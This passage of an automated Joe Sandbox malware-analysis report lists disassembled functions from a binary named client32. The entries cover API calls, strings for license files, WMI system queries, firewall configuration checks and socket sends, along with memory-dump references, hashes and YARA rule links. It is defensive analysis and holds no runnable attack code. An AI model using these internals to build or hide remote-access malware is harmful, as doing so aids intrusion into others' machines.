                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                  • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                  • API String ID: 3494822531-1878648853
                                                                                  • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                  • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                  • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                  • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                  Function 6FA02F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _calloc.LIBCMT ref: 6FA02FBB
                                                                                  • GetTickCount.KERNEL32 ref: 6FA0300D
                                                                                  • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6FA0301B
                                                                                  • _calloc.LIBCMT ref: 6FA0303B
                                                                                  • _memmove.LIBCMT ref: 6FA03049
                                                                                  • InterlockedDecrement.KERNEL32(-000397B9), ref: 6FA0307F
                                                                                  • SetEvent.KERNEL32(000002EC,?,?,?,?,?,?,?,?,?,?,?,?,?,?,905C34B3), ref: 6FA0308C
                                                                                    • Part of subcall function 6FA028D0: wsprintfA.USER32 ref: 6FA02965
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3178096747-0
                                                                                  • Opcode ID: d828eae940b2303ac413adecd604e015490c1360adacf76dc20f466d83ef12f1
                                                                                  • Instruction ID: 02e7f44b4837edf39fe2207306d0a8959d5e3aa07491c2c392cc6e600045cc9c
                                                                                  • Opcode Fuzzy Hash: d828eae940b2303ac413adecd604e015490c1360adacf76dc20f466d83ef12f1
                                                                                  • Instruction Fuzzy Hash: 874185B6C00308AFDB10DFA9EC45AEFB7F8AF48314F00851AE505E7280E774A645CBA0
                                                                                  Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsJPIK.PCICHEK(50D94AA1,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free_malloc_memsetwsprintf
                                                                                  • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                  • API String ID: 2814900446-469156069
                                                                                  • Opcode ID: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                  • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                  • Opcode Fuzzy Hash: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                  • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                  Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
                                                                                  • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                  • CoUninitialize.COMBASE ref: 110179C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                  • API String ID: 2407233060-578995875
                                                                                  • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                  • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                  • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                  • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                  Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
                                                                                  • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                  • CoUninitialize.COMBASE ref: 110178D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                  • API String ID: 2407233060-2037925671
                                                                                  • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                  • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                  • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                  • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                  Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • AutoICFConfig, xrefs: 11139650
                                                                                  • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                  • DoICFConfig() OK, xrefs: 111396D6
                                                                                  • Client, xrefs: 11139655
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                  • API String ID: 536389180-1512301160
                                                                                  • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                  • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                  • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                  • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                  Function 6F9F9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • send.WSOCK32(?,?,?,00000000), ref: 6F9F9C93
                                                                                  • timeGetTime.WINMM(?,?,?,00000000), ref: 6F9F9CD0
                                                                                  • Sleep.KERNEL32(00000000), ref: 6F9F9CDE
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6F9F9D4F
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 6F9F9D72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                  • String ID: 3'
                                                                                  • API String ID: 77915721-280543908
                                                                                  • Opcode ID: cee15a8c2466a6910415bdc5dc332940a379b86622b2d421258065bde6fa87e7
                                                                                  • Instruction ID: b568688e0d3531713c08483028070367c37fd90d6529776b06081bcb373a0cb6
                                                                                  • Opcode Fuzzy Hash: cee15a8c2466a6910415bdc5dc332940a379b86622b2d421258065bde6fa87e7
                                                                                  • Instruction Fuzzy Hash: 07215171A051188FDB20DF64CD84B9AB7B8AF05324F1182D5E91D9B2C5C734ED86CF91
                                                                                  Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                  • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                  • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                  • API String ID: 3222248624-258972079
                                                                                  • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                  • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                  • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                  • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                  Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                  • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                  • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                  • API String ID: 4186647306-532032230
                                                                                  • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                  • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                  • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                  • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                  Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                  • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                  • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                  • API String ID: 3360349984-1136101629
                                                                                  • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                  • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                  • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                  • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                  Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %s%s%s.bin$648351$_HF$_HW$_SW
                                                                                  • API String ID: 2111968516-434105583
                                                                                  • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                  • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                  • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                  • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                  Function 6FA06940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06950
